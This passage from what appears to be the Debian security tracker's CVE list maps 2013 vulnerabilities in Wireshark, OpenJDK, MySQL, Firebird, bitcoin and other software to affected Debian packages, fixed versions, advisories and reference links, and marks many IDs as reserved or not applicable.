	[wheezy] - isc-dhcp (Minor issue)
	[squeeze] - isc-dhcp (Only affects 4.2.x)
CVE-2013-2493 (The Hook_Terminate function in chrome_frame/protocol_sink_wrap.cc in ...)
	NOT-FOR-US: Google Chrome Frame plugin for Internet Explorer
CVE-2013-2492 (Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before ...)
	{DSA-2648-1 DSA-2647-1}
	- firebird2.1 (bug #702735)
	- firebird2.5 2.5.2~svn+54698.ds4-2 (bug #702736)
	NOTE: http://tracker.firebirdsql.org/browse/CORE-4058
CVE-2013-2491
	RESERVED
CVE-2013-2490
	RESERVED
CVE-2013-2489
	RESERVED
CVE-2013-2488 (The DTLS dissector in Wireshark 1.6.x before 1.6.14 and 1.8.x before ...)
	{DSA-2644-1}
	- wireshark 1.8.2-5
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-22.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8380
	NOTE: Versions affected: 1.8.0 to 1.8.X, 1.6.0 to 1.6.X
CVE-2013-2487 (epan/dissectors/packet-reload.c in the REsource LOcation And Discovery ...)
	- wireshark 1.8.6-1 (unimportant)
	[squeeze] - wireshark (only 1.8.x series)
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-21.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8364
	NOTE: Versions affected: 1.8.0 to 1.8.5
	NOTE: Not suitable for code injection
CVE-2013-2486 (The dissect_diagnosticrequest function in ...)
	- wireshark 1.8.6-1 (unimportant)
	[squeeze] - wireshark (only 1.8.x series)
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-21.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8364
	NOTE: Versions affected: 1.8.0 to 1.8.5
	NOTE: Not suitable for code injection
CVE-2013-2485 (The FCSP dissector in Wireshark 1.6.x before 1.6.14 and 1.8.x before ...)
	- wireshark 1.8.6-1 (unimportant)
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-20.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8359
	NOTE: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13
	NOTE: Not suitable for code injection
CVE-2013-2484 (The CIMD dissector in Wireshark 1.6.x before 1.6.14 and 1.8.x before ...)
	{DSA-2644-1}
	- wireshark 1.8.2-5
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-19.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8346
	NOTE: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13
CVE-2013-2483 (The acn_add_dmp_data function in epan/dissectors/packet-acn.c in the ...)
	{DSA-2644-1}
	- wireshark 1.8.2-5 (unimportant)
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-18.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8340
	NOTE: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13
	NOTE: Not suitable for code injection
CVE-2013-2482 (The AMPQ dissector in Wireshark 1.6.x before 1.6.14 and 1.8.x before ...)
	- wireshark 1.8.6-1 (unimportant)
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-17.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8337
	NOTE: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13
	NOTE: Not suitable for code injection
CVE-2013-2481 (Integer signedness error in the dissect_mount_dirpath_call function in ...)
	{DSA-2644-1}
	- wireshark 1.8.2-5 (unimportant)
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-16.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8335
	NOTE: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13
	NOTE: Not suitable for code injection
CVE-2013-2480 (The RTPS and RTPS2 dissectors in Wireshark 1.6.x before 1.6.14 and ...)
	{DSA-2644-1}
	- wireshark 1.8.2-5
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-15.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8332
	NOTE: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13
CVE-2013-2479 (The dissect_mpls_echo_tlv_dd_map function in ...)
	- wireshark 1.8.6-1 (unimportant)
	[squeeze] - wireshark (only affecting 1.8.x)
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-14.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8039
	NOTE: Versions affected: 1.8.0 to 1.8.5
	NOTE: Not suitable for code injection
CVE-2013-2478 (The dissect_server_info function in epan/dissectors/packet-ms-mms.c in ...)
	{DSA-2644-1}
	- wireshark 1.8.2-5
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-13.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8382
	NOTE: announce mentions: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13
CVE-2013-2477 (The CSN.1 dissector in Wireshark 1.8.x before 1.8.6 does not properly ...)
	- wireshark 1.8.2-5
	[squeeze] - wireshark (only affecting 1.8.x)
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-12.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8383
	NOTE: Versions affected: 1.8.0 to 1.8.5
CVE-2013-2476 (The dissect_hartip function in epan/dissectors/packet-hartip.c in the ...)
	- wireshark 1.8.6-1 (unimportant)
	[squeeze] - wireshark (only affecting 1.8.x)
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-11.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8360
	NOTE: Versions affected: 1.8.0 to 1.8.5
	NOTE: Not suitable for code injection
CVE-2013-2475 (The TCP dissector in Wireshark 1.8.x before 1.8.6 allows remote ...)
	- wireshark 1.8.2-5
	[squeeze] - wireshark (only affecting 1.8.x)
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-10.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8274
	NOTE: Versions affected: 1.8.0 to 1.8.5
CVE-2013-2474
	RESERVED
CVE-2013-2473
	RESERVED
CVE-2013-2472
	RESERVED
CVE-2013-2471
	RESERVED
CVE-2013-2470
	RESERVED
CVE-2013-2469
	RESERVED
CVE-2013-2468
	RESERVED
CVE-2013-2467
	RESERVED
CVE-2013-2466
	RESERVED
CVE-2013-2465
	RESERVED
CVE-2013-2464
	RESERVED
CVE-2013-2463
	RESERVED
CVE-2013-2462
	RESERVED
CVE-2013-2461
	RESERVED
CVE-2013-2460
	RESERVED
CVE-2013-2459
	RESERVED
CVE-2013-2458
	RESERVED
CVE-2013-2457
	RESERVED
CVE-2013-2456
	RESERVED
CVE-2013-2455
	RESERVED
CVE-2013-2454
	RESERVED
CVE-2013-2453
	RESERVED
CVE-2013-2452
	RESERVED
CVE-2013-2451
	RESERVED
CVE-2013-2450
	RESERVED
CVE-2013-2449
	RESERVED
CVE-2013-2448
	RESERVED
CVE-2013-2447
	RESERVED
CVE-2013-2446
	RESERVED
CVE-2013-2445
	RESERVED
CVE-2013-2444
	RESERVED
CVE-2013-2443
	RESERVED
CVE-2013-2442
	RESERVED
CVE-2013-2441 (Unspecified vulnerability in the Agile EDM component in Oracle Supply ...)
	NOT-FOR-US: Oracle Supply Chain Products Suite
CVE-2013-2440 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-2439 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Installation performed differently for Linux distros)
	- openjdk-7 (Installation performed differently for Linux distros)
CVE-2013-2438 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-2437
	RESERVED
CVE-2013-2436 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 (Only affects Java7)
CVE-2013-2435 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-2434 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Only affects Java 7)
	- openjdk-7 (Specific to Oracle Java, not present in IcedTea)
	NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected
CVE-2013-2433 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-2432 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Specific to Oracle Java, not present in IcedTea)
	- openjdk-7 (Specific to Oracle Java, not present in IcedTea)
	NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected
CVE-2013-2431 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 (Only affects Java7)
CVE-2013-2430 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-2429 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-2428 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-2427 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-2426 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 (Only affects Java 7)
CVE-2013-2425 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Only applies to Java 7)
	- openjdk-7 (Installation performed differently for Linux distros)
CVE-2013-2424 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-2423 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 (Only applies to Java 7)
CVE-2013-2422 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-2421 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 (Only affects Java 7)
CVE-2013-2420 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-2419 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-2418 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-2417 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-2416 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Only affects Java 7)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-2415 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Only affects Java 7)
	- openjdk-6 6b27-1.12.5-1
CVE-2013-2414 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-2413 (Unspecified vulnerability in the Siebel Enterprise Application ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2013-2412
	RESERVED
CVE-2013-2411 (Unspecified vulnerability in the Primavera P6 Enterprise Project ...)
	NOT-FOR-US: Oracle Primavera Products
CVE-2013-2410 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS component ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-2409 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-2408 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-2407
	RESERVED
CVE-2013-2406 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-2405 (Unspecified vulnerability in the Primavera P6 Enterprise Project ...)
	NOT-FOR-US: Oracle Primavera Products
CVE-2013-2404 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-2403 (Unspecified vulnerability in the Siebel Enterprise Application ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2013-2402 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-2401 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-2400
	RESERVED
CVE-2013-2399 (Unspecified vulnerability in the Siebel Call Center component in ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2013-2398 (Unspecified vulnerability in the Siebel UI Framework component in ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2013-2397 (Unspecified vulnerability in the Oracle Retail Central Office ...)
	NOT-FOR-US: Oracle Industry Applications
CVE-2013-2396 (Unspecified vulnerability in the Oracle Applications Manager component ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2013-2395 (Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows ...)
	- mysql-5.5 (Only affects MySQL 5.6)
	- mysql-5.1 (Only affects MySQL 5.6)
CVE-2013-2394 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Specific to Oracle Java, not present in IcedTea)
	- openjdk-7 (Specific to Oracle Java, not present in IcedTea)
	NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected
CVE-2013-2393 (Unspecified vulnerability in the Oracle Outside In Technology ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-2392 (Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 ...)
	{DSA-2667-1}
	- mysql-5.5 5.5.31+dfsg-1
	- mysql-5.1
CVE-2013-2391 (Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 ...)
	{DSA-2667-1}
	- mysql-5.5 5.5.31+dfsg-1
	- mysql-5.1
CVE-2013-2390 (Unspecified vulnerability in the Oracle WebLogic Server component in ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-2389 (Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 ...)
	{DSA-2667-1}
	- mysql-5.5 5.5.31+dfsg-1
	- mysql-5.1
CVE-2013-2388 (Unspecified vulnerability in the Oracle Applications Technology Stack ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2013-2387 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-2386 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-2385 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-2384 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-2383 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-2382 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-2381 (Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows ...)
	- mysql-5.1 (Only affects MySQL 5.6)
	- mysql-5.5 (Only affects MySQL 5.6)
CVE-2013-2380 (Unspecified vulnerability in the Oracle JRockit component in Oracle ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-2379 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-2378 (Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, 5.5.29 ...)
	- mysql-5.5 5.5.30+dfsg-1
	- mysql-5.1
CVE-2013-2377 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-2376 (Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and ...)
	{DSA-2667-1}
	- mysql-5.5 5.5.31+dfsg-1
	- mysql-5.1 (Only affects MySQL 5.5 and 5.6)
CVE-2013-2375 (Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 ...)
	{DSA-2667-1}
	- mysql-5.5 5.5.31+dfsg-1
	- mysql-5.1
CVE-2013-2374 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-2373 (The Engine in TIBCO Spotfire Web Player 3.3.x before 3.3.3, 4.0.x ...)
	NOT-FOR-US: TIBCO Spotfire Web Player
CVE-2013-2372 (Cross-site scripting (XSS) vulnerability in the Engine in TIBCO ...)
	NOT-FOR-US: TIBCO Spotfire Web Player
CVE-2013-2371 (The Web API in the Statistics Server in TIBCO Spotfire Statistics ...)
	NOT-FOR-US: TIBCO Spotfire Statistics
CVE-2013-2370
	RESERVED
CVE-2013-2369
	RESERVED
CVE-2013-2368
	RESERVED
CVE-2013-2367
	RESERVED
CVE-2013-2366
	RESERVED
CVE-2013-2365
	RESERVED
CVE-2013-2364
	RESERVED
CVE-2013-2363
	RESERVED
CVE-2013-2362
	RESERVED
CVE-2013-2361
	RESERVED
CVE-2013-2360
	RESERVED
CVE-2013-2359
	RESERVED
CVE-2013-2358
	RESERVED
CVE-2013-2357
	RESERVED
CVE-2013-2356
	RESERVED
CVE-2013-2355
	RESERVED
CVE-2013-2354
	RESERVED
CVE-2013-2353
	RESERVED
CVE-2013-2352
	RESERVED
CVE-2013-2351
	RESERVED
CVE-2013-2350
	RESERVED
CVE-2013-2349
	RESERVED
CVE-2013-2348
	RESERVED
CVE-2013-2347
	RESERVED
CVE-2013-2346
	RESERVED
CVE-2013-2345
	RESERVED
CVE-2013-2344
	RESERVED
CVE-2013-2343
	RESERVED
CVE-2013-2342
	RESERVED
CVE-2013-2341
	RESERVED
CVE-2013-2340
	RESERVED
CVE-2013-2339
	RESERVED
CVE-2013-2338
	RESERVED
CVE-2013-2337
	RESERVED
CVE-2013-2336
	RESERVED
CVE-2013-2335
	RESERVED
CVE-2013-2334
	RESERVED
CVE-2013-2333
	RESERVED
CVE-2013-2332
	RESERVED
CVE-2013-2331
	RESERVED
CVE-2013-2330
	RESERVED
CVE-2013-2329
	RESERVED
CVE-2013-2328
	RESERVED
CVE-2013-2327
	RESERVED
CVE-2013-2326
	RESERVED
CVE-2013-2325
	RESERVED
CVE-2013-2324
	RESERVED
CVE-2013-2323
	RESERVED
CVE-2013-2322
	RESERVED
CVE-2013-2321 (Cross-site scripting (XSS) vulnerability in HP Service Manager Web ...)
	NOT-FOR-US: HP Service Manager
CVE-2013-2320
	RESERVED
CVE-2013-2319
	RESERVED
CVE-2013-2318
	RESERVED
CVE-2013-2317
	RESERVED
CVE-2013-2316
	RESERVED
CVE-2013-2315
	RESERVED
CVE-2013-2314
	RESERVED
CVE-2013-2313
	RESERVED
CVE-2013-2312
	RESERVED
CVE-2013-2311
	RESERVED
CVE-2013-2310
	RESERVED
CVE-2013-2309
	RESERVED
CVE-2013-2308 (The (1) OWA Helper and (2) OSG Lite programs in SoftBank Online ...)
	NOT-FOR-US: SoftBank Online Service Gate
CVE-2013-2307 (The Yahoo! Browser application before 1.4.3 for Android allows remote ...)
	NOT-FOR-US: Yahoo! Browser application for Android
CVE-2013-2306 (The jigbrowser+ application before 1.6.4 for Android does not properly ...)
	NOT-FOR-US: jigbrowser+ application for Android
CVE-2013-2305 (Cross-site request forgery (CSRF) vulnerability in Cybozu Office ...)
	NOT-FOR-US: Cybozu
CVE-2013-2304 (The Sleipnir Mobile application 2.8.0 and earlier and Sleipnir Mobile ...)
	NOT-FOR-US: Sleipnir
CVE-2013-2303 (Sleipnir 4.0.0.4000 and earlier on Windows allows remote attackers to ...)
	NOT-FOR-US: Sleipnir
CVE-2013-2302 (TransWARE Active! mail 6, when an external public interface is used, ...)
	NOT-FOR-US: TransWARE Active! mail
CVE-2013-2301 (The OMRON OpenWnn application before 1.3.6 for Android uses weak ...)
	NOT-FOR-US: OpenWnn application
CVE-2013-2300 (The FlickWnn (aka OpenWnn/Flick support) application 2.02 and earlier ...)
	NOT-FOR-US: FlickWnn Android App
CVE-2013-2299
	RESERVED
CVE-2013-2298
	RESERVED
	- boinc 7.0.65+dfsg-1 (low)
	[wheezy] - boinc (Minor issue, only exploitable by a rogue BOINC server)
	[squeeze] - boinc (Minor issue, only exploitable by a rogue BOINC server)
	NOTE: http://boinc.berkeley.edu/gitweb/?p=boinc-v2.git;a=commitdiff;h=2fea03824925cbcb976f4191f4d8321e41a4d95b
CVE-2013-2297
	RESERVED
CVE-2013-2296 [Walrus does not check authorization for some operations]
	RESERVED
	- eucalyptus (bug #707592)
	NOTE: commit: https://github.com/eucalyptus/eucalyptus/commit/da7bb8b7c15d453e62df38eff5c12d0998e6eab1
	NOTE: https://eucalyptus.atlassian.net/browse/EUCA-3074
CVE-2013-2295
	RESERVED
CVE-2013-2294
	RESERVED
	NOT-FOR-US: ViewGit
CVE-2013-2293 (The CTransaction::FetchInputs method in bitcoind and Bitcoin-Qt before ...)
	- bitcoin 0.8.1-2 (bug #705265)
CVE-2013-2292 (bitcoind and Bitcoin-Qt 0.8.0 and earlier allow remote attackers to ...)
	- bitcoin
CVE-2013-2291
	RESERVED
CVE-2013-2290 (Cross-site scripting (XSS) vulnerability in the dashboard of the ...)
	NOT-FOR-US: Aruba Networks ArubaOS
CVE-2013-2289
	RESERVED
CVE-2013-2288
	RESERVED
CVE-2013-2287
	RESERVED
CVE-2013-2286
	RESERVED
CVE-2013-2285
	RESERVED
CVE-2013-2284
	RESERVED
CVE-2013-2283
	RESERVED
CVE-2013-2282
	RESERVED
CVE-2013-2281
	RESERVED
CVE-2013-2280
	RESERVED
CVE-2013-2279 (CA SiteMinder Federation (FSS) 12.5, 12.0, and r6; Federation ...)
	NOT-FOR-US: CA SiteMinder
CVE-2013-2278
	RESERVED
CVE-2013-2277 (The ff_h264_decode_seq_parameter_set function in h264_ps.c in ...)
	- ffmpeg
	- libav 6:0.8.6-1 (bug #703200)
CVE-2013-2276 (The avcodec_decode_audio4 function in utils.c in libavcodec in FFmpeg ...)
	- ffmpeg (Doesn't affect libav, specific to current ffmpeg)
	- libav (Doesn't affect libav, specific to current ffmpeg)
CVE-2013-2275 (The default configuration for puppet masters 0.25.0 and later in ...)
	{DSA-2643-1}
	- puppet 2.7.18-3
CVE-2013-2274 (Puppet 2.6.x before 2.6.18 and Puppet Enterprise 1.2.x before 1.2.7 ...)
	{DSA-2643-1}
	- puppet 2.7-1
	NOTE: Only affects puppet 2.6.x
CVE-2013-2273 (bitcoind and Bitcoin-Qt before 0.4.9rc1, 0.5.x before 0.5.8rc1, 0.6.0 ...)
	- bitcoin
CVE-2013-2272 (The penny-flooding protection mechanism in the CTxMemPool::accept ...)
	- bitcoin 0.8.1-2 (bug #705266)
CVE-2013-2271
	RESERVED
CVE-2013-2270
	RESERVED
CVE-2013-2269
	RESERVED
CVE-2013-2268 (Unspecified vulnerability in the MathML implementation in WebKit in ...)
	- chromium-browser 25.0.1364.97-1
	[squeeze] - chromium-browser (Vulnerable code not present)
	NOTE: MathML added in chromium 24.x, disabled again in 25.x
CVE-2012-6534 (Novell Sentinel Log Manager before 1.2.0.3 allows remote attackers to ...)
	NOT-FOR-US: Novell Sentinel Log Manager
CVE-2013-2267
	RESERVED
CVE-2013-2266 (libdns in ISC BIND 9.7.x and 9.8.x before 9.8.4-P2, 9.8.5 before ...)
	{DSA-2656-1}
	- bind9 1:9.8.4.dfsg.P1-6+nmu1 (bug #704174)
CVE-2013-2265
	RESERVED
CVE-2013-2264 (The SIP channel driver in Asterisk Open Source 1.8.x before 1.8.20.2, ...)
	- asterisk 1:1.8.13.1~dfsg-2 (low; bug #704114)
	NOTE: https://issues.asterisk.org/jira/browse/ASTERISK-21013
CVE-2013-2263 (Unspecified vulnerability in Citrix Access Gateway Standard Edition ...)
	NOT-FOR-US: Citrix Access Gateway
CVE-2013-2262
	RESERVED
CVE-2013-2261
	RESERVED
CVE-2013-2260
	RESERVED
CVE-2013-2259
	RESERVED
CVE-2013-2258
	RESERVED
CVE-2013-2257
	RESERVED
CVE-2013-2256
	RESERVED
CVE-2013-2255
	RESERVED
CVE-2013-2254
	RESERVED
CVE-2013-2253
	RESERVED
CVE-2013-2252
	RESERVED
CVE-2013-2251
	RESERVED
CVE-2013-2250
	RESERVED
CVE-2013-2249
	RESERVED
CVE-2013-2248
	RESERVED
CVE-2013-2247
	RESERVED
CVE-2013-2246
	RESERVED
CVE-2013-2245
	RESERVED
CVE-2013-2244
	RESERVED
CVE-2013-2243
	RESERVED
CVE-2013-2242
	RESERVED
CVE-2013-2241
	RESERVED
CVE-2013-2240
	RESERVED
CVE-2013-2239
	RESERVED
CVE-2013-2238
	RESERVED
CVE-2013-2237
	RESERVED
CVE-2013-2236
	RESERVED
CVE-2013-2235
	RESERVED
CVE-2013-2234
	RESERVED
CVE-2013-2233
	RESERVED
CVE-2013-2232
	RESERVED
CVE-2013-2231
	RESERVED
CVE-2013-2230
	RESERVED
CVE-2013-2229
	RESERVED
CVE-2013-2228
	RESERVED
CVE-2013-2227
	RESERVED
CVE-2013-2226
	RESERVED
CVE-2013-2225
	RESERVED
CVE-2013-2224
	RESERVED
CVE-2013-2223
	RESERVED
CVE-2013-2222
	RESERVED
CVE-2013-2221
	RESERVED
CVE-2013-2220
	RESERVED
CVE-2013-2219
	RESERVED
CVE-2013-2218
	RESERVED
CVE-2013-2217
	RESERVED
CVE-2013-2216
	RESERVED
CVE-2013-2215
	RESERVED
CVE-2013-2214
	RESERVED
CVE-2013-2213
	RESERVED
CVE-2013-2212
	RESERVED
CVE-2013-2211
	RESERVED
CVE-2013-2210
	RESERVED
CVE-2013-2209
	RESERVED
CVE-2013-2208
	RESERVED
CVE-2013-2207
	RESERVED
CVE-2013-2206
	RESERVED
CVE-2013-2205
	RESERVED
CVE-2013-2204
	RESERVED
CVE-2013-2203
	RESERVED
CVE-2013-2202
	RESERVED
CVE-2013-2201
	RESERVED
CVE-2013-2200
	RESERVED
CVE-2013-2199
	RESERVED
CVE-2013-2198
	RESERVED
CVE-2013-2197
	RESERVED
CVE-2013-2196
	RESERVED
CVE-2013-2195
	RESERVED
CVE-2013-2194
	RESERVED
CVE-2013-2193
	RESERVED
CVE-2013-2192
	RESERVED
CVE-2013-2191
	RESERVED
CVE-2013-2190
	RESERVED
CVE-2013-2189
	RESERVED
CVE-2013-2188
	RESERVED
CVE-2013-2187
	RESERVED
CVE-2013-2186
	RESERVED
CVE-2013-2185
	RESERVED
CVE-2013-2184
	RESERVED
CVE-2013-2183
	RESERVED
CVE-2013-2182
	RESERVED
CVE-2013-2181
	RESERVED
CVE-2013-2180
	RESERVED
CVE-2013-2179
	RESERVED
CVE-2013-2178
	RESERVED
CVE-2013-2177
	RESERVED
CVE-2013-2176
	RESERVED
CVE-2013-2175
	RESERVED
CVE-2013-2174
	RESERVED
CVE-2013-2173
	RESERVED
CVE-2013-2172
	RESERVED
CVE-2013-2171
	RESERVED
CVE-2013-2170
	RESERVED
CVE-2013-2169
	RESERVED
CVE-2013-2168
	RESERVED
CVE-2013-2167
	RESERVED
CVE-2013-2166
	RESERVED
CVE-2013-2165
	RESERVED
CVE-2013-2164
	RESERVED
CVE-2013-2163
	RESERVED
CVE-2013-2162
	RESERVED
CVE-2013-2161
	RESERVED
CVE-2013-2160
	RESERVED
CVE-2013-2159
	RESERVED
CVE-2013-2158
	RESERVED
CVE-2013-2157
	RESERVED
CVE-2013-2156
	RESERVED
CVE-2013-2155
	RESERVED
CVE-2013-2154
	RESERVED
CVE-2013-2153
	RESERVED
CVE-2013-2152
